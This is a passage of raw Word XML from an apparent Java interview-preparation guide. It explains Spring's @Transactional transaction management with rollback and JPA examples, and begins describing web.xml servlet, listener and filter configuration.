          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C7F174"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Transactional(propagation = Propagation.REQUIRED, isolation = Isolation.READ_COMMITTED, timeout = 30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186D80A"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ublic void performBusinessLogic() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1ADCDD"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 Business logic that should be managed as a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A97CCF9"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3C9F3942"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436479C9" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Rollback Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0E193"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By default, Spring rolls back on RuntimeException and Error but not on checked exceptions. You can specify custom rollback behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA77CE"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Transactional(rollbackFor = Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2E48A"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public void performBusinessLogic() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52966B1B"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 Logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97D701"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if (someCondition) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20264B"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throw new Exception("This will trigger rollback");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69D87E"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1AA36465"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094F2BAB" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00000000" w:rsidP="00085C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1D51BFA">
          <v:rect id="_x0000_i2113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B02B5" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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How Transactions Work Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B3AD74" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1882"/>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Transaction Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511EA7E" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1882"/>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When the method annotated with @Transactional is called, Spring starts a transaction. A new transaction is either created or joined based on the propagation setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5DDC2F" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1882"/>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Transaction Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4E3F2" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1882"/>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After the method executes successfully, the transaction is committed (the changes are saved to the database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343991E8" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1882"/>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Transaction Rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F46B4" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1882"/>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If an exception occurs (and it is a type that triggers a rollback), the transaction is rolled back, undoing any changes made within the scope of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C681D90" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1882"/>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The rollback happens at the end of the method, and Spring ensures that no partial updates are committed to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014303AB" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00000000" w:rsidP="00085C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79F268D">
          <v:rect id="_x0000_i2114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F06F3F" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Spring Transaction Management Example (with JPA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE8793C"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FE4B9"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public class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E766A59" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDA8357"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED847D"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rivate UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0067D5" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9C279A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA814E4"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ublic void updateUserInfo(Long userId, String newEmail) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D362F6B"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User user = userRepository.findById(userId).orElseThrow(() -&gt; new RuntimeException("User not found"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5E55F"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user.setEmail(newEmail);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD74FC"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 The changes are automatically saved when the transaction is committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127DAA9C"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7A06EBF3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7696BBD7" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB11CF9" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1883"/>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The @Transactional annotation ensures that the database operations inside updateUserInfo() are executed within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1254C" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1883"/>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If any exception occurs, the transaction will be rolled back automatically, meaning any changes to the User entity will not be persisted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF087DC" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00000000" w:rsidP="00085C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F96DC2C">
          <v:rect id="_x0000_i2115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98E60D" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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Summary of Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE667A" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1884"/>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Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring can be handled programmatically or declaratively using @Transactional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E236C" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1884"/>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Declarative Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @Transactional is the most common and recommended approach, as it allows Spring to automatically handle the transaction lifecycle (begin, commit, rollback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351BC8D" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1884"/>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You can customize the behavior of transactions using attributes like propagation, isolation, timeout, and rollbackFor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB50A8" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1884"/>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Spring supports multiple transaction managers (e.g., DataSourceTransactionManager, JpaTransactionManager) based on the data source or ORM being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178BB863" w14:textId="7F561147" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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CCA135F">
          <v:rect id="_x0000_i2116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E4CD74" w14:textId="22049011" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00B96CA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="_Toc196307922"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you know the web.xml file? What is the significance of a web.xml file</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:p w14:paraId="275BFDEF" w14:textId="49D16566" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deployment Descriptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a configuration file used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that run on </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Tomcat, Jetty, etc.). It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java EE</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Enterprise Edition) specification, and is typically located in the WEB-INF directory of a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F299012" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7"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Significance of web.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888B8A3"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The web.xml file serves as the main configuration for the web application and defines various aspects of the application's behavior, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40202499" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Servlet Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28E430" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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It defines </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlets</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are Java classes that handle requests in a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6E0C7" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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Each servlet is mapped to a specific URL pattern or servlet name, so it can respond to requests matching the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9F5E0"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A8C70"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t;servlet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA540A"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servlet-name&gt;myServlet&lt;/servlet-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6676FC0A"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servlet-class&gt;com.example.MyServlet&lt;/servlet-class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB007DC"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t;/servlet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A8944" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE0E9C5"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t;servlet-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74EBE7"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servlet-name&gt;myServlet&lt;/servlet-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AE5BF"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url-pattern&gt;/myServlet&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C885B"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t;/servlet-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527FF33" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Listener Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A760FD5" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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It allows you to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Listeners</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are objects that listen to certain events, like context initialization or session creation. These can be used for various tasks like logging, auditing, or initializing resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A4314"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC5B44"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t;listener&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49460310"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listener-class&gt;com.example.MyListener&lt;/listener-class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF061F8"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t;/listener&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB39D1" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Filter Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015CEC8" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to intercept and process requests or responses before they reach the servlet. They can be used for tasks such as logging, authentication, or modifying request/response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAAFEA"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lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B7501"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t;filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08348EC5"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filter-name&gt;authFilter&lt;/filter-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355C227"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filter-class&gt;com.example.AuthenticationFilter&lt;/filter-class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0640E9"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t;/filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F51651" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4365FC04"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t;filter-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A81F015"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filter-name&gt;authFilter&lt;/filter-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E42C2C"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url-pattern&gt;/protected/*&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F65F5"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t;/filter-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7736E7" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Context Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07822007" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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It allows the configuration of </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
